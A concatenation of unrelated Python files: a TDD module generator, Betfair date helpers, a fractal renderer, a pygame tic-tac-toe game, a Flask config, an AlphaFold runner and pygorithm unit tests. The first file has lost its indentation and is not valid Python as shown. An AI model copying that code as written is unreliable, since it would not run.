# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
from TDDConfig import CTestPkgDescription
from TDDConfig import CTestConfig
from TDDConfig import CCovCfg
from TDDConfig import CStaticAnalysisCfg
from TDDConfig import CFormaterGuidelineCheckerCfg
from TDDConfig import CTestToolchainCfg
from TDDConfig import CCodeStatisticsCfg
from pathlib import Path
from datetime import datetime
import colorama
from colorama import Fore, Style
def checkIfFolderExists(pathFldr):
if not pathFldr.is_dir():
pathFldr.mkdir()
def boolToStr(valBool):
str_retVal = 'False'
if valBool:
str_retVal = 'True'
return str_retVal
def copyTxtFile(str_src, str_dst):
dest = Path(str_dst)
src = Path(str_src)
dest.write_text(src.read_text())
def readFileToStr(str_src: str):
retStr = ''
with open(str_src, 'r') as ftext:
retStr = ftext.read()
return retStr
def writeStringToFile(strVar,str_dst):
with open(str_dst, 'w') as ftext:
ftext.write(strVar)
def patchString(strVar,patchDict):
for key in patchDict.keys():
strVar = strVar.replace(key,patchDict[key])
return strVar
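# Illustrative example (not from the original source):
# patchString('Hello <NAME>', {'<NAME>': 'world'}) returns 'Hello world'; every key found in the
# string is replaced by its value.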
def timeInShortString():
now = datetime.now()
return now.strftime('%y%m%d%H%M%S')
def assertWithText(condition, text):
assert condition, text
def printout(text):
print(text)
def get_input(text):
return input(text)
def createFolder(str_folder):
'''
Ensure that the folder exists; create it (including parents) when it is missing.
Raises an AssertionError if the folder could not be created.
'''
pHeaderFolder = Path(str_folder)
if not pHeaderFolder.is_dir():
pHeaderFolder.mkdir(mode=0o777, parents=True)
assertWithText(pHeaderFolder.is_dir(), 'Creating folder %s failed!' % (str_folder))
def processFile(str_src, str_dest, dic):
'''
Copy the file from str_src to str_dest, replacing every occurrence of each key in dic with its value.
'''
#1 open file and read to string variable
strVar = readFileToStr(str_src)
#2 patch string with dictionary
patchStrVar = patchString(strVar,dic)
#3 store string in file str_dest
writeStringToFile(patchStrVar,str_dest)
pass
def questionReturningPositiveInteger(questionText, default_uint=-1, forced_default=False):
if forced_default:
printout(questionText + ' Using forced default value[%i]' % (default_uint))
return default_uint
b_confirm = False
int_retVal = -1
while not b_confirm:
str_retVal = get_input(questionText + ' [Fill positive number(default is %i)]:' % (default_uint))
if "" == str_retVal:
int_retVal = default_uint
elif str_retVal.isdecimal():
int_retVal = int(str_retVal)
else:
printout('Invalid input try it again.')
continue
if 0 < int_retVal :
# b_confirm = questionYesNo('Confirm this value: %i' % (int_retVal))
b_confirm = True
return int_retVal
def questionReturnString(questionText):
'''
Ask the user to enter a string value and return it.
'''
#b_confirm = False
#str_retVal = ''
#while not b_confirm:
# str_retVal = get_input(questionText)
# b_confirm = questionYesNo('Confirm this value: %s' % (str_retVal))
#return str_retVal
return get_input(questionText)
def questionYesNo(QuestionOfText, default_val=True, forced_default = False):
if default_val:
str_def = 'yes'
else:
str_def = 'no'
if forced_default:
        printout(QuestionOfText + ' Using default value[%s]' % (str_def))
return default_val
bRetVal = False
while(1):
answer = get_input(QuestionOfText + ' [yes(y)|no(n)] (default %s):' % (str_def))
if answer == "yes" or answer == 'y':
bRetVal = True
break
elif answer == "no" or answer == 'n':
break
elif answer == '':
bRetVal = default_val
break
else:
printout("Incorrect input value.")
return (bRetVal)
def questionWithList(QuestionOfText, choices, default):
    str_RetVal = default
    str_choices = ' | '.join(choices)
    while(1):
        answer = get_input(QuestionOfText + " ( %s ) default[%s]:" % (str_choices, str_RetVal))
        if answer == "":
            printout('Using value: %s' % (str_RetVal))
            break
        elif answer in choices:
            str_RetVal = answer
            break
        else:
            printout("Incorrect input value.")
    return (str_RetVal)
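# Illustrative use:
#   questionWithList('Choose suffix for src file.', ['cpp', 'cc'], 'cpp')
#   returns 'cpp' when the user just presses Enter, otherwise the entry the user typed.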
class CreateNewModule():
str_SRC_FOLDER: str
str_SRC_FOLDER_REL: str
str_HEADER_FOLDER: str
str_HEADER_FOLDER_REL: str
str_FRAMEWORK: str
str_TOOLCHAIN: str
str_LANGUAGE: str
str_COMPONENT_NAME: str
str_SRC_TYPE: str
str_TPKG_FOLDER: str
copyFileLst: [(str,str)]
testConfig: CTestConfig
pkgDesc: CTestPkgDescription
def __init__(self, cTestPkgDesc: CTestPkgDescription):
self.str_SRC_FOLDER = ''
self.str_SRC_FOLDER_REL = ''
self.str_HEADER_FOLDER = ''
self.str_HEADER_FOLDER_REL = ''
self.str_SRC_FILE = ''
self.str_HEADER_FILE = ''
self.str_FRAMEWORK = "cpputest"
self.str_TOOLCHAIN = "mingw"
self.str_LANGUAGE = 'c++'
self.str_COMPONENT_NAME = ''
self.str_SRC_TYPE = ''
self.str_TPKG_FOLDER = ''
self.copyFileLst = []
self.testConfig = CTestConfig()
self.pkgDesc = cTestPkgDesc
pass
def createAndCopyFiles(self):
self.createHeaderFile()
self.createSourceFile()
self.copyAndCreateTestFiles()
self.copyAndCreateMemLeakMacroFiles()
self.createTestInitFile()
self.createTestCMakefile()
pass
def setModuleConfiguration(self):
'''
        This function creates the configuration for the new module.
        The result is the definition of the files and the type of source code,
        plus the complete test configuration.
        Function explanation:
        1) define what type of module we want to create: c/c++
        2) define SUT file configuration
           a) name of the class or package
           b) names of the files (NAME.suffix) for header and source
        3) define test configuration for additional steps
'''
# define src folder
## question if user wants to create C or C++
printout('')
self.str_LANGUAGE = questionWithList("What type of code will be the new module?", ['c++','c'], 'c++')
printout(Fore.GREEN + 'Definition of SUT Files configuration' + Style.RESET_ALL)
self.defineSutFileConfiguration()
printout(Fore.GREEN + 'Definition of coverage check' + Style.RESET_ALL)
self.defineCoverageCfg()
printout(Fore.GREEN + 'Definition of static analysis check' + Style.RESET_ALL)
self.defineStatAnalysisCfg()
printout(Fore.GREEN + 'Definition of toolchain for test' + Style.RESET_ALL + ' (Default)')
self.defineToolchainCfg()
printout(Fore.GREEN + 'Definition of code statistics check' + Style.RESET_ALL)
self.defineCodeStatisticsCfg()
pass
def createNewModule(self):
'''
        This function creates a new module according to the user's wishes.
        1) First the user defines how the module should look.
        2) Create the new SUT header and source file.
        3) Create the new test package folder and fill it with default files and the user configuration.
'''
colorama.init()
printout(Fore.YELLOW + 'Creating new module' + Style.RESET_ALL)
printout(Fore.CYAN + 'Definition of module:' + Style.RESET_ALL)
self.setModuleConfiguration()
printout(Fore.CYAN + 'Checking/Creating SUT folder' + Style.RESET_ALL)
self.createFolder_SUT()
printout(Fore.CYAN + 'Checking/Creating TPKG folder' + Style.RESET_ALL)
self.createFolder_TPKG()
printout(Fore.CYAN + 'Copying/Creating TPKG files' + Style.RESET_ALL)
self.createAndCopyFiles()
pass
def defineSutFileConfiguration(self):
'''
        Create the file names and the folders where the SUT files will be placed.
'''
# this fill self.str_SRC_FILE
# self.str_HEADER_FILE
self.defineSutFileNames()
# this fill self.str_SRC_FOLDER
# self.str_HEADER_FOLDER
self.defineSutFolders()
pass
def createFolder_SUT(self):
'''
        Check whether the SUT folders exist and create them if they do not.
'''
createFolder(self.str_HEADER_FOLDER)
createFolder(self.str_SRC_FOLDER)
def createFolder_TPKG(self):
'''
        Create the TPKG folder and its subfolder.
        When the TPKG folder already exists, a new one is created with the
        current date embedded in its name.
'''
pTpkgFldr = Path(self.pkgDesc.str_testpath) / (self.str_COMPONENT_NAME + self.pkgDesc.str_testfldr_suffix)
if pTpkgFldr.is_dir():
pTpkgFldr = Path(self.pkgDesc.str_testpath) / (self.str_COMPONENT_NAME + timeInShortString() + self.pkgDesc.str_testfldr_suffix)
self.str_TPKG_FOLDER = str(pTpkgFldr)
createFolder(self.str_TPKG_FOLDER)
createFolder(str(pTpkgFldr / self.pkgDesc.str_srctestfldr))
def defineSutFileNames(self):
'''
        Create the names of the SUT files (header and source).
        The file names are stored as attributes.
'''
str_srcsuff = ''
str_headersuff = ''
printout("New SUT object definition:")
if self.str_LANGUAGE == 'c++':
str_srcsuff = questionWithList('Choose suffix for src file.',['cpp', 'CPP', 'cc', 'CC'],'cpp')
#print(str_srcsuff)
str_headersuff = questionWithList('Choose suffix for header file.',['hpp','HPP','h','H'],'hpp')
#print(str_headersuff)
elif self.str_LANGUAGE == 'c':
str_srcsuff = questionWithList('Choose suffix for src file.',['c', 'C'],'c')
str_headersuff = questionWithList('Choose suffix for header file.',['h','H'],'h')
pass
else:
assert False, 'Currently not supported source file type.'
self.str_COMPONENT_NAME = questionReturnString('Define class/module name: ')
#print([self.str_COMPONENT_NAME,str_srcsuff])
str_fullSrcName = '.'.join([self.str_COMPONENT_NAME,str_srcsuff])
str_fullHeaderName = '.'.join([self.str_COMPONENT_NAME,str_headersuff])
printout("New SUT file are: \n\t%s\n\t%s" % (str_fullHeaderName, str_fullSrcName))
if not questionYesNo('Are names correct?', forced_default=True):
str_fullHeaderName = questionReturnString('Define full name for header (name.suff).')
str_fullSrcName = questionReturnString('Define full name for source (name.suff).')
self.str_SRC_FILE = str_fullSrcName
self.str_HEADER_FILE = str_fullHeaderName
def defineSutFolders(self):
'''
        Define the location of the SUT files (header and source).
        Default folders are offered, but the user can override them separately for header and source.
        The header and source folders are stored as attributes.
'''
self.str_SRC_FOLDER_REL = 'src'
self.str_HEADER_FOLDER_REL = 'include'
path_SrcFolder = Path(self.pkgDesc.str_srcfldr) / self.str_SRC_FOLDER_REL
path_HeaderFolder = Path(self.pkgDesc.str_srcfldr) / self.str_HEADER_FOLDER_REL
str_SrcFolder = str(path_SrcFolder)
str_HeaderFolder = str(path_HeaderFolder)
printout("Default folders:\n\tHeader: %s\n\tSource: %s" % (str_HeaderFolder, str_SrcFolder))
if not questionYesNo('Are folders correct?'):
self.str_HEADER_FOLDER_REL = questionReturnString('Define folder name for header. (inside \"%s\" folder):' % (self.pkgDesc.str_srcfldr))
self.str_SRC_FOLDER_REL = questionReturnString('Define folder name for source. (inside \"%s\" folder):' % (self.pkgDesc.str_srcfldr))
path_HeaderFolder = Path(self.pkgDesc.str_srcfldr) / self.str_HEADER_FOLDER_REL
path_SrcFolder = Path(self.pkgDesc.str_srcfldr) / self.str_SRC_FOLDER_REL
str_SrcFolder = str(path_SrcFolder)
str_HeaderFolder = str(path_HeaderFolder)
self.str_SRC_FOLDER = str_SrcFolder
self.str_HEADER_FOLDER = str_HeaderFolder
pass
def defineCoverageCfg(self):
'''
User can define coverage configuration.
'''
self.testConfig.co_coverage.isTurnedOn = questionYesNo('Do you want to enable coverage:', forced_default=True)
self.testConfig.co_coverage.uncoveredLineListLength = 0
pass
def defineStatAnalysisCfg(self):
'''
User can define static analysis configuration.
'''
self.testConfig.co_staticAnalysis.isTurnedOn = questionYesNo('Do you want to enable static analysis:', forced_default=True)
        # this configuration only makes sense when static analysis is turned on; otherwise it can stay in its default state.
if self.testConfig.co_staticAnalysis.isTurnedOn:
            self.testConfig.co_staticAnalysis.isLanguageDefinedBySuffix = questionYesNo('Should the language be recognized from the file suffix:', default_val=False, forced_default=True)
self.testConfig.co_staticAnalysis.str_c_version = questionWithList('Choose version of c.',['c89', 'c99', 'c11'],'c99')
self.testConfig.co_staticAnalysis.str_cpp_version = questionWithList('Choose version of c++.',['c++03', 'c++11', 'c++14', 'c++17', 'c++20'],'c++11')
self.testConfig.co_staticAnalysis.str_tool = 'cppcheck'
self.testConfig.co_staticAnalysis.str_ForcedLang = self.str_LANGUAGE
def defineToolchainCfg(self):
'''
User can define toolchain configuration.
        Currently these choices are disabled and fixed defaults are used.
'''
self.testConfig.co_testToolchain.str_compiler = 'mingw'
self.testConfig.co_testToolchain.str_testlib = 'cpputest'
pass
def defineCodeStatisticsCfg(self):
'''
        User can define the code statistics configuration.
'''
self.testConfig.co_codeStatistics.isTurnedOn = questionYesNo('Do you want to enable code quality parameters:', forced_default=True)
if self.testConfig.co_codeStatistics.isTurnedOn:
            self.testConfig.co_codeStatistics.isUsedTestSpecificOnly = questionYesNo('Do you want to use only test parameters? Global params will not be taken into account.', forced_default=True)
if not self.testConfig.co_codeStatistics.isUsedTestSpecificOnly:
                self.testConfig.co_codeStatistics.isUsedStricter = questionYesNo('Do you want to use the stricter criteria (test vs. global):', forced_default=True)
self.testConfig.co_codeStatistics.int_mccabeComplex = questionReturningPositiveInteger('Define McCabe complexity',default_uint=8,forced_default=True)
self.testConfig.co_codeStatistics.int_fncLength = questionReturningPositiveInteger('Define function length',default_uint=50,forced_default=True)
self.testConfig.co_codeStatistics.int_paramCnt = questionReturningPositiveInteger('Define maximum function params',default_uint=4,forced_default=True)
def createHeaderFile(self):
'''
        Check the language, choose the matching default template file
        and substitute the configured values into it.
'''
str_src = ''
path_src = Path('Tools') / 'defaults' / 'src_templates'
dict = {'%COMPONENT_NAME': self.str_COMPONENT_NAME
,'%FILENAME': self.str_HEADER_FILE.split('.')[0]
,'%DATE':datetime.now().strftime('%d.%m.%y %H:%M:%S')
,'%YEAR':datetime.now().strftime('%Y')
}
if 'c++' == self.str_LANGUAGE:
dict['%CLASSNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'class.hpp'
elif 'c' == self.str_LANGUAGE:
path_src = path_src / 'c_file.h'
else:
assertWithText(False, 'Invalid language type.')
str_src = str(path_src)
str_dst = str(Path(self.str_HEADER_FOLDER) / self.str_HEADER_FILE)
processFile(str_src,str_dst, dict)
pass
def createSourceFile(self):
'''
Copy and process source file.
'''
str_src = ''
path_src = Path('Tools') / 'defaults' / 'src_templates'
dict = {'%COMPONENT_NAME': self.str_COMPONENT_NAME
,'%FILENAME': self.str_SRC_FILE.split('.')[0]
,'%DATE':datetime.now().strftime('%d.%m.%y %H:%M:%S')
,'%YEAR':datetime.now().strftime('%Y')
,'%HEADER_FILENAME': self.str_HEADER_FILE
}
if 'c++' == self.str_LANGUAGE:
dict['%CLASSNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'class.cpp'
elif 'c' == self.str_LANGUAGE:
path_src = path_src / 'c_file.c'
else:
assertWithText(False, 'Invalid language type.')
str_src = str(path_src)
#print(self.str_SRC_FILE)
str_dst = str(Path(self.str_SRC_FOLDER) / self.str_SRC_FILE)
processFile(str_src,str_dst, dict)
def copyAndCreateTestFiles(self):
'''
Copy and process test.cpp and AllTests.cpp
'''
        #0 check that the _Tpkg/src folder exists (not strictly necessary when this method is called in the right order)
pTestFldr = Path(self.str_TPKG_FOLDER) / self.pkgDesc.str_srctestfldr
checkIfFolderExists(pTestFldr)
#1 copy AllTests.cpp
str_allTsts = 'AllTests.cpp'
str_allTestFileDst = str(pTestFldr / str_allTsts)
str_allTestFileSrc = str(Path('Tools') / 'defaults' / 'src_templates' / str_allTsts)
copyTxtFile(str_allTestFileSrc,str_allTestFileDst)
#2 process test file according language
str_src = ''
path_src = Path('Tools') / 'defaults' / 'src_templates'
dict = {'%COMPONENT_NAME': self.str_COMPONENT_NAME
,'%FILENAME': self.str_SRC_FILE.split('.')[0]
,'%DATE':datetime.now().strftime('%d.%m.%y %H:%M:%S')
,'%YEAR':datetime.now().strftime('%Y')
,'%HEADER_FILENAME': self.str_HEADER_FILE
}
if 'c++' == self.str_LANGUAGE:
dict['%CLASSNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'test.cpp'
elif 'c' == self.str_LANGUAGE:
dict['%TESTGROUPNAME'] = self.str_COMPONENT_NAME
path_src = path_src / 'c_test.cpp'
else:
assertWithText(False, 'Invalid language type.')
str_src = str(path_src)
str_dst = str(pTestFldr / 'test.cpp')
processFile(str_src,str_dst, dict)
def copyAndCreateMemLeakMacroFiles(self):
pDstFldr = Path(self.str_TPKG_FOLDER) / self.pkgDesc.str_srctestfldr
pSrcDefaultFldr = Path('Tools') / 'defaults' / 'src_templates'
checkIfFolderExists(pDstFldr)
str_memLeakDetectionNewMacFile = 'MemLeakDetectionNewMacros.h'
str_memLeakDetectionMalMacFile = 'MemLeakDetectionMallocMacros.h'
copyTxtFile(str(pSrcDefaultFldr / str_memLeakDetectionNewMacFile),str(pDstFldr / str_memLeakDetectionNewMacFile))
copyTxtFile(str(pSrcDefaultFldr / str_memLeakDetectionMalMacFile),str(pDstFldr / str_memLeakDetectionMalMacFile))
pass
def createTestInitFile(self):
pTestFldr = Path(self.str_TPKG_FOLDER)
checkIfFolderExists(pTestFldr)
dict = { '%SRC_FLDR%': self.str_SRC_FOLDER_REL
,'%SRC_FILENAME%': self.str_SRC_FILE
,'%HEADER_FLDR%': self.str_HEADER_FOLDER_REL
,'%HEADER_FILENAME%': self.str_HEADER_FILE
,'%COVERAGE_IS_USED%': boolToStr(self.testConfig.co_coverage.isTurnedOn)
,'%COVERAGE_UNCOVLISTLEN%': str(self.testConfig.co_coverage.uncoveredLineListLength)
,'%CHECKCODE_IS_USED%': boolToStr(self.testConfig.co_staticAnalysis.isTurnedOn)
,'%CHECKCODE_TOOL%': self.testConfig.co_staticAnalysis.str_tool
,'%CHECKCODE_FORCEDLANG%': self.testConfig.co_staticAnalysis.str_ForcedLang
,'%CHECKCODE_C_VERSION%': self.testConfig.co_staticAnalysis.str_c_version
,'%CHECKCODE_CPP_VERSION%': self.testConfig.co_staticAnalysis.str_cpp_version
,'%TOOLCHAIN%': self.testConfig.co_testToolchain.str_compiler
,'%FRAMEWORK%': self.testConfig.co_testToolchain.str_testlib
,'%STATISTICS_IS_USED%': boolToStr(self.testConfig.co_codeStatistics.isTurnedOn)
,'%STATISTICS_USE_SPECIFIC_ONLY%': boolToStr(self.testConfig.co_codeStatistics.isUsedTestSpecificOnly)
,'%STATISTICS_USE_STRICTER%': boolToStr(self.testConfig.co_codeStatistics.isUsedStricter)
,'%STATISTICS_MCCAVE_LEVEL%': str(self.testConfig.co_codeStatistics.int_mccabeComplex)
,'%STATISTICS_FNCLEN_LEVEL%': str(self.testConfig.co_codeStatistics.int_fncLength)
,'%STATISTICS_PARAM_CNT%': str(self.testConfig.co_codeStatistics.int_paramCnt)
}
str_src = str(Path('Tools') / 'defaults' / 'src_templates' / 'test.ini')
str_dst = str(pTestFldr / self.pkgDesc.str_testcfgfilename)
processFile(str_src,str_dst,dict)
pass
def createTestCMakefile(self):
dict = {'%TESTPACKAGENAME%': self.str_COMPONENT_NAME}
str_src = str(Path('Tools') / 'defaults' / 'src_templates' / 'CMakeLists.txt')
str_dst = str(Path(self.str_TPKG_FOLDER) / 'CMakeLists.txt')
processFile(str_src,str_dst,dict)
pass
|
python
|
from typing import Optional
from datetime import datetime
BETFAIR_DATE_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"
basestring = (str, bytes)
numeric_types = (int, float)
integer_types = (int,)
# will attempt to use C/Rust libraries if installed
try:
import orjson as json
except ImportError:
import json
try:
import ciso8601
def parse_datetime(datetime_string: str) -> Optional[datetime]:
try:
return ciso8601.parse_datetime_as_naive(datetime_string)
except ValueError:
return
except ImportError:
def parse_datetime(datetime_string: str) -> Optional[datetime]:
try:
return datetime.strptime(datetime_string, BETFAIR_DATE_FORMAT)
except ValueError:
return
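# Behavior of either implementation (illustrative):
#   parse_datetime("2021-06-01T12:30:45.123000Z") -> datetime(2021, 6, 1, 12, 30, 45, 123000)
#   parse_datetime("not a date")                  -> None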
|
python
|
from random import random
from matplotlib import pyplot as plt
import numpy as np
def discrete(a):
t = sum(a)*random()
subtotal = 0.0
for j in range(len(a)):
subtotal += a[j]
if subtotal > t:
return j
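# discrete() is roulette-wheel selection: index j is returned with probability
# proportional to a[j], e.g. discrete([1, 3]) yields 1 about three times as often as 0.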
def tabler():
n, *m = map(int, input().split(' '))
return [[float(x) for x in input().split(' ')] for _ in range(n)] if m else [float(x) for x in input().split(' ')]
rep = 100000  # fixed iteration count; replace with int(input()) to read it from stdin
ps, xs, ys = (tabler() for _ in range(3))
w, h = 1024, 1024
im = np.zeros((w, h), np.uint8)  # start from a black image; hit pixels are set to 255 below
x = y = 0.0
for i in range(rep):
r = discrete(ps)
x0 = xs[r][0] * x + xs[r][1] * y + xs[r][2]
y0 = ys[r][0] * x + ys[r][1] * y + ys[r][2]
x, y = x0, y0
    im[int(y * w), int(x * h)] = 255
plt.imshow(im, origin='lower')
plt.show()
|
python
|
import pygame as pg
import sys
import time
from pygame.locals import *
# Setting up few properties
XO = 'x'
winner = None
draw = None
width = 500
height = 450
white = (255, 255, 255)
line_color = (130, 0, 0)
board = [[None]*3, [None]*3, [None]*3]
pg.init()
fps = 30
CLOCK = pg.time.Clock()
screen = pg.display.set_mode((width, height + 100), 0, 32)
pg.display.set_caption("Tic Tac Turtle")
time.sleep(5)
# loading the images as python object
initiating_window = pg.image.load("resources/modified_cover.png")
x_img = pg.image.load("resources/X_modified.png")
y_img = pg.image.load("resources/o_modified.png")
rematch = pg.image.load("resources/rematch.jpg")
thanks = pg.image.load("resources/thanks.jpg")
arko = pg.image.load("resources/arko.jpg")
code_loop = pg.image.load("resources/code_loop.jpg")
the_as8_org = pg.image.load("resources/the_as8_org.jpg")
# resizing images
initiating_window = pg.transform.scale(initiating_window, (width, height + 100))
x_img = pg.transform.scale(x_img, (80, 80))
o_img = pg.transform.scale(y_img, (80, 80))
# Sounds and Music
x_sound = pg.mixer.Sound("resources/x.wav")
o_sound = pg.mixer.Sound("resources/o.wav")
m_sound = pg.mixer.Sound("resources/m.wav")
music = pg.mixer.music.load("resources/music.mp3")
pg.mixer.music.play(-1)
def screen_timer(screen,time,slide):
i = 0
while i < time+1:
CLOCK.tick(fps)
screen.blit(slide, (0,0))
for event in pg.event.get():
if event.type == pg.QUIT:
pg.quit()
i += 1
pg.display.update()
def game_initiating_window():
screen.blit(initiating_window, (0, 0))
pg.display.update()
time.sleep(3)
screen.fill(white)
# drawing vertical lines
pg.draw.line(screen, line_color, (width / 3, 0), (width / 3, height), 7)
pg.draw.line(screen, line_color, (width / 3 * 2, 0), (width / 3 * 2, height), 7)
# drawing horizontal lines
pg.draw.line(screen, line_color, (0, height / 3), (width, height / 3), 7)
pg.draw.line(screen, line_color, (0, height / 3 * 2), (width, height / 3 * 2), 7)
draw_status()
def draw_status():
global draw
if winner is None:
message = XO.upper() + "'s Turn"
else:
message = winner.upper() + " won !"
if draw:
message = "Game Draw !"
font = pg.font.SysFont("georgia", 40)
text = font.render(message, 1, (255, 255, 255))
screen.fill ((130, 0, 0), (0, 450, 500, 100))
text_rect = text.get_rect(center =(width / 2, 500))
screen.blit(text, text_rect)
pg.display.update()
def check_win():
global board, winner, draw
# checking for winning rows
for row in range(0, 3):
if((board[row][0] == board[row][1] == board[row][2]) and (board [row][0] is not None)):
winner = board[row][0]
m_sound.play()
time.sleep(0.5)
pg.draw.line(screen, (130, 0, 0), (0, (row + 1)*height / 3 -height / 6), (width, (row + 1)*height / 3 - height / 6 ), 5)
break
# checking for winning columns
for col in range(0, 3):
if((board[0][col] == board[1][col] == board[2][col]) and (board[0][col] is not None)):
winner = board[0][col]
m_sound.play()
time.sleep(0.5)
pg.draw.line(screen, (130, 0, 0), ((col + 1)* width / 3 - width / 6, 0), ((col + 1)* width / 3 - width / 6, height), 5)
break
# check for diagonal winners
if (board[0][0] == board[1][1] == board[2][2]) and (board[0][0] is not None):
# game won diagonally left to right
winner = board[0][0]
m_sound.play()
time.sleep(0.5)
pg.draw.line(screen, (130, 0, 0), (50, 50), (450, 400), 5)
if (board[0][2] == board[1][1] == board[2][0]) and (board[0][2] is not None):
# game won diagonally right to left
winner = board[0][2]
m_sound.play()
time.sleep(0.5)
pg.draw.line (screen, (130, 0, 0), (450, 50), (50, 400), 5)
if(all([all(row) for row in board]) and winner is None ):
draw = True
draw_status()
def drawXO(row, col):
global board, XO
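    # note: posx is used as the vertical (top) offset and posy as the
    # horizontal (left) offset in the screen.blit() calls below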
if row == 1:
posx = 40
if row == 2:
posx = width / 3 + 25
if row == 3:
posx = width / 3 * 2 + 10
if col == 1:
posy = 47
if col == 2:
posy = height / 3 + 65
if col == 3:
posy = height / 3 * 2 + 80
board[row-1][col-1] = XO
if(XO == 'x'):
x_sound.play()
time.sleep(0.6)
screen.blit(x_img, (posy, posx))
XO = 'o'
else:
o_sound.play()
time.sleep(0.6)
screen.blit(o_img, (posy, posx))
XO = 'x'
pg.display.update()
def user_click():
x, y = pg.mouse.get_pos()
if(x<width / 3):
col = 1
elif (x<width / 3 * 2):
col = 2
elif(x<width):
col = 3
else:
col = None
if(y<height / 3):
row = 1
elif (y<height / 3 * 2):
row = 2
elif(y<height):
row = 3
else:
row = None
if(row and col and board[row-1][col-1] is None):
global XO
drawXO(row, col)
check_win()
def reset_game1():
time.sleep(3)
screen.blit(rematch, (0,0))
pg.display.update()
x, y = pg.mouse.get_pos()
if (x<255 and x > 170) and (y>275 and y<360):
reset_game2()
elif (x>265 and x<330) and (y>275 and y<360):
screen_timer(screen,150,thanks)
screen_timer(screen,200,arko)
screen_timer(screen,150,code_loop)
screen_timer(screen,200,the_as8_org)
screen_timer(screen,200,initiating_window)
pg.quit()
sys.exit()
def reset_game2():
global board, winner, XO, draw
XO = 'x'
draw = False
game_initiating_window()
winner = None
board = [[None]*3, [None]*3, [None]*3]
game_initiating_window()
while(True):
for event in pg.event.get():
if event.type == QUIT:
pg.quit()
sys.exit()
        elif event.type == MOUSEBUTTONDOWN:
user_click()
if(winner or draw):
reset_game1()
pg.display.update()
CLOCK.tick(fps)
|
python
|
import os
from datetime import timedelta
DEBUG = True
SQLALCHEMY_TRACK_MODIFICATIONS = False
PROPAGATE_EXCEPTIONS = True
JWT_BLACK_LIST_ENABLED = True
UPLOADED_IMAGES_DEST = os.path.join("static", "images")
JWT_BLACK_LIST_TOKEN_CHECKS = ["access", "refresh"]
JWT_SECRET_KEY = os.environ["JWT_SECRET_KEY"]
JWT_ACCESS_TOKEN_EXPIRES = timedelta(hours=1)
SECRET_KEY = os.environ["APP_SECRET_KEY"]
uri = os.environ.get("DATABASE_URI") # or other relevant config var
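# SQLAlchemy 1.4+ no longer accepts the legacy "postgres://" scheme that some
# providers (e.g. Heroku) still supply, so rewrite it to "postgresql://" below.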
if uri and uri.startswith("postgres://"):
uri = uri.replace("postgres://", "postgresql://", 1)
SQLALCHEMY_DATABASE_URI = uri
|
python
|
import os
from tqdm import tqdm
import subprocess
def alphafold(path):
# run alphafold
print("Running for path {}...".format(path))
    # pass each flag and its value as separate argv tokens so the run script's
    # option parser sees them correctly; '~' is expanded explicitly since no shell is involved
    subprocess.run(['bash', '/opt/alphafold/run.sh',
                    '-d', '/lambda_stor/data/hsyoo/AlphaFoldData',
                    '-o', os.path.expanduser('~/mutate_msa/folding_results/'),
                    '-f', path, '-t', '2020-05-01', '-p', 'casp14',
                    '-m', 'model_1,model_2,model_3,model_4,model_5',
                    '-a', '0,1,3,4,5,6,7'])
if __name__ == "__main__":
files = os.listdir('mutations')
for f in tqdm(files):
alphafold('mutations/{}'.format(f))
|
python
|
# -*- coding: utf-8 -*-
import unittest
import random
from pygorithm.data_structures import (
stack,
queue,
linked_list,
tree,
graph,
heap,
trie,
quadtree,
)
from pygorithm.geometry import vector2, rect2
class TestStack(unittest.TestCase):
def test_stack(self):
myStack = stack.Stack() # create a stack with default stack size 10
myStack.push(2)
myStack.push(10)
myStack.push(12)
myStack.push(3)
self.assertEqual(myStack.pop(), 3)
self.assertEqual(myStack.peek(), 12)
self.assertFalse(myStack.is_empty())
nullStack = stack.Stack()
self.assertEqual(nullStack.pop(), -1)
self.assertEqual(nullStack.peek(), -1)
self.assertTrue(nullStack.is_empty())
class TestInfixToPostfix(unittest.TestCase):
def test_infix_to_postfix(self):
myExp = "a+b*(c^d-e)^(f+g*h)-i"
myExp = [i for i in myExp]
myStack = stack.Stack(len(myExp)) # create a stack
result = stack.InfixToPostfix(myExp, myStack)
resultString = result.infix_to_postfix()
expectedResult = "a b c d ^ e - f g h * + ^ * + i -"
        self.assertEqual(resultString, expectedResult)
class TestKruskal(unittest.TestCase):
def test_minimum_spanning_tree(self):
"""
        test inspired by the example at the following link: https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
edges_weighted = [
((1, 2), 7),
((2, 3), 8),
((1, 4), 5),
((2, 4), 9),
((2, 5), 7),
((3, 5), 5),
((4, 6), 6),
((5, 6), 8),
((5, 7), 9),
((6, 7), 11),
((4, 5), 15),
]
wgraph = graph.WeightedGraph()
for (u, v), weight in edges_weighted:
wgraph.add_edge(u, v, weight)
expected = [
((1, 4), 5),
((3, 5), 5),
((4, 6), 6),
((1, 2), 7),
((2, 5), 7),
((5, 7), 9),
]
self.assertEqual(wgraph.kruskal_mst(), expected)
def test_minimum_spanning_tree_2(self):
"""
Test inspired by the gif at the left of the page https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
edges_weighted = [
((1, 2), 3),
((1, 5), 1),
((2, 5), 4),
((2, 3), 5),
((3, 5), 6),
((3, 4), 2),
((4, 5), 7),
]
wgraph = graph.WeightedGraph()
for (u, v), weight in edges_weighted:
wgraph.add_edge(u, v, weight)
expected = [((1, 5), 1), ((3, 4), 2), ((1, 2), 3), ((2, 3), 5)]
self.assertEqual(wgraph.kruskal_mst(), expected)
class TestQueue(unittest.TestCase):
def test_queue(self):
myQueue = queue.Queue() # create a queue with default queue size 10
